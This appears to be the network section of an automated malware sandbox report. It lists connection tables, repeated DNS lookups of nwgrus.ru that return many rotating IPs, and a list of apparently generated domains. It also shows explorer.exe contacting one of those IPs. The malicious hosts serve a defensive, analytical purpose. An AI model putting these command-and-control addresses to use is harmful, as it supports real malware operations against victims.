                                                                                                                          Oct 8, 2024 18:26:16.356237888 CEST8061464190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:16.356323004 CEST8061464190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:16.707957029 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:16.707998037 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:16.708074093 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:16.708373070 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:16.708383083 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.300792933 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.300901890 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:17.301983118 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:17.301992893 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.302676916 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.303463936 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:17.303488016 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:17.303548098 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.379561901 CEST8061464190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.380424023 CEST8061464190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.380496979 CEST6146480192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:17.380541086 CEST6146480192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:17.385477066 CEST8061464190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.815597057 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.815695047 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.815781116 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:17.815846920 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:17.815870047 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:17.815882921 CEST61465443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:17.815891027 CEST4436146523.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:35.185826063 CEST6146680192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:35.190865993 CEST8061466190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:35.190962076 CEST6146680192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:35.191060066 CEST6146680192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:35.191082001 CEST6146680192.168.2.6190.249.249.14
                                                                                                                          Oct 8, 2024 18:26:35.196249962 CEST8061466190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:35.196309090 CEST8061466190.249.249.14192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:36.031562090 CEST61467443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:36.031681061 CEST4436146723.145.40.168192.168.2.6
                                                                                                                          Oct 8, 2024 18:26:36.031771898 CEST61467443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:36.032071114 CEST61467443192.168.2.623.145.40.168
                                                                                                                          Oct 8, 2024 18:26:36.032111883 CEST4436146723.145.40.168192.168.2.6
Oct 8, 2024 18:26:36.768918991 CEST | 80 | 61466 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:36.768965006 CEST | 80 | 61466 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:36.768992901 CEST | 80 | 61466 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:36.769020081 CEST | 80 | 61466 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:36.769052029 CEST | 61466 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:36.769069910 CEST | 61466 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:36.769069910 CEST | 61466 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:36.769284964 CEST | 61466 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:37.025470018 CEST | 80 | 61466 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:37.025599003 CEST | 61466 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:37.030239105 CEST | 80 | 61466 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:37.618309021 CEST | 443 | 61467 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:37.618436098 CEST | 61467 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:37.620408058 CEST | 61467 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:37.620424986 CEST | 443 | 61467 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:37.621191025 CEST | 443 | 61467 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:37.622060061 CEST | 61467 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:37.622097969 CEST | 61467 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:37.622236013 CEST | 443 | 61467 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:37.988838911 CEST | 443 | 61467 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:37.988929987 CEST | 443 | 61467 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:37.988989115 CEST | 61467 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:37.992449999 CEST | 61467 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:37.992470026 CEST | 443 | 61467 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:37.992490053 CEST | 61467 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:37.992496967 CEST | 443 | 61467 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:54.063692093 CEST | 61469 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:54.069727898 CEST | 80 | 61469 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:54.069921017 CEST | 61469 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:54.070030928 CEST | 61469 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:54.070061922 CEST | 61469 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:54.075407982 CEST | 80 | 61469 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:54.075443983 CEST | 80 | 61469 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:55.069500923 CEST | 80 | 61469 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:55.070358038 CEST | 80 | 61469 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:55.070440054 CEST | 61469 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:55.071645975 CEST | 61469 | 80 | 192.168.2.6 | 190.249.249.14
Oct 8, 2024 18:26:55.076503992 CEST | 80 | 61469 | 190.249.249.14 | 192.168.2.6
Oct 8, 2024 18:26:55.365998030 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:55.366044998 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:55.366126060 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:55.366416931 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:55.366426945 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:56.005043983 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:56.005121946 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:56.006145954 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:56.006151915 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:56.006352901 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:56.007095098 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:56.007134914 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:56.007152081 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:56.524872065 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:56.524969101 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:56.525044918 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:56.525190115 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:56.525208950 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Oct 8, 2024 18:26:56.525219917 CEST | 61470 | 443 | 192.168.2.6 | 23.145.40.168
Oct 8, 2024 18:26:56.525224924 CEST | 443 | 61470 | 23.145.40.168 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 18:23:24.388371944 CEST | 61041 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:23:25.392151117 CEST | 61041 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:23:26.407597065 CEST | 61041 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:23:26.750308037 CEST | 53 | 61041 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 18:23:26.750391006 CEST | 53 | 61041 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 18:23:26.750401974 CEST | 53 | 61041 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 18:23:29.461184025 CEST | 53 | 60404 | 162.159.36.2 | 192.168.2.6
Oct 8, 2024 18:23:30.641814947 CEST | 49862 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:23:30.650778055 CEST | 53 | 49862 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 18:23:33.239840984 CEST | 63355 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:23:34.235874891 CEST | 63355 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:23:35.235821962 CEST | 63355 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:23:35.317315102 CEST | 53 | 63355 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 18:23:35.318294048 CEST | 53 | 63355 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 18:23:35.318507910 CEST | 53 | 63355 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 18:24:19.663417101 CEST | 60976 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:24:19.708350897 CEST | 53 | 60976 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 18:26:15.947964907 CEST | 61885 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 18:26:16.345263958 CEST | 53 | 61885 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 18:23:24.388371944 CEST | 192.168.2.6 | 1.1.1.1 | 0x2a83 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:25.392151117 CEST | 192.168.2.6 | 1.1.1.1 | 0x2a83 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.407597065 CEST | 192.168.2.6 | 1.1.1.1 | 0x2a83 | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:30.641814947 CEST | 192.168.2.6 | 1.1.1.1 | 0xbd58 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 8, 2024 18:23:33.239840984 CEST | 192.168.2.6 | 1.1.1.1 | 0xea0e | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:34.235874891 CEST | 192.168.2.6 | 1.1.1.1 | 0xea0e | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.235821962 CEST | 192.168.2.6 | 1.1.1.1 | 0xea0e | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:24:19.663417101 CEST | 192.168.2.6 | 1.1.1.1 | 0x4d31 | Standard query (0) | ninjahallnews.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:15.947964907 CEST | 192.168.2.6 | 1.1.1.1 | 0x9d3a | Standard query (0) | nwgrus.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 18:23:15.670839071 CEST | 1.1.1.1 | 192.168.2.6 | 0x4cdb | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:15.670839071 CEST | 1.1.1.1 | 192.168.2.6 | 0x4cdb | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 160.177.223.165 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 200.45.93.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 116.58.10.60 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 189.165.155.245 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 190.98.23.157 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750308037 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 160.177.223.165 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 200.45.93.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 116.58.10.60 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 189.165.155.245 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 190.98.23.157 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750391006 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 160.177.223.165 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 200.45.93.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 116.58.10.60 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 189.165.155.245 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 190.98.23.157 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:26.750401974 CEST | 1.1.1.1 | 192.168.2.6 | 0x2a83 | No error (0) | nwgrus.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:30.650778055 CEST | 1.1.1.1 | 192.168.2.6 | 0xbd58 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 160.177.223.165 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 200.45.93.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 116.58.10.60 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 189.165.155.245 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 190.98.23.157 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.317315102 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 160.177.223.165 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 200.45.93.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 116.58.10.60 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 189.165.155.245 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 190.98.23.157 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318294048 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 160.177.223.165 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 200.45.93.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 116.58.10.60 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 189.165.155.245 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 190.98.23.157 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:23:35.318507910 CEST | 1.1.1.1 | 192.168.2.6 | 0xea0e | No error (0) | nwgrus.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:24:15.632531881 CEST | 1.1.1.1 | 192.168.2.6 | 0x158c | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:24:15.632531881 CEST | 1.1.1.1 | 192.168.2.6 | 0x158c | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:24:19.708350897 CEST | 1.1.1.1 | 192.168.2.6 | 0x4d31 | No error (0) | ninjahallnews.com |  | 23.145.40.168 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 190.249.249.14 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 190.98.23.157 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 109.98.58.98 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 160.177.223.165 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 58.151.148.90 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 200.45.93.45 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 211.168.53.110 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 211.171.233.126 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 116.58.10.60 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 18:26:16.345263958 CEST | 1.1.1.1 | 192.168.2.6 | 0x9d3a | No error (0) | nwgrus.ru |  | 189.165.155.245 | A (IP address) | IN (0x0001) | false
• 23.145.40.164
• https:
  • ninjahallnews.com
• ajlkwtshfrbwcj.com
  • nwgrus.ru
• lmqmhcivixmahfcs.com
• eqlgmwxqcstymthl.net
• uajyyjejyvvbvl.org
• fcbqaeiodmerjjce.net
• uqyhewsqgme.net
• mcnivsvqoyuiyi.com
• snlvxdcuggcgtr.com
• rcayuliatuydngjp.net
• gxhoywsjvhdimib.org
• hnkujwopesopy.org
• gcsggiqiypjqctoh.net
• swrrssmuceopwlwv.com
• mcrofbggconl.net
• euadhmjtligscip.net
• oratgvwctswjsrg.com
• jukynnhymwnwl.org
• pithrelifcqallw.net
• kdahnseejtpvc.org
• umfnnmmrmjakpw.org
• hjaonoqsbnhieap.net
• kfntyderqkkh.net
• bpuffphxcjr.net
• evwfmjkyovghciew.net
• dxitdoiirfghic.org
• goilbsuxbgu.com
• bmhunjcauidhfjas.com
• ehqwwnwmwdh.net
• oawojikvjxqxudp.com
• xlurbvunmfixk.org
• kamxftfsfgaby.com
• oqmylvnapebvw.com
• hyeljwvkydclsem.net
• ovnkboilnwpev.org
• elavhytildeantb.net
• qvpxnipvuyciicri.org
• nsxfaafbvsvkfwb.net
• euvycibbjmraba.com
• istrtdmsewdifyn.com
• chihuprqnvownoad.org
• muicqrvubdhbsy.org
• xfevllovssfdblv.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49836 | 160.177.223.165 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
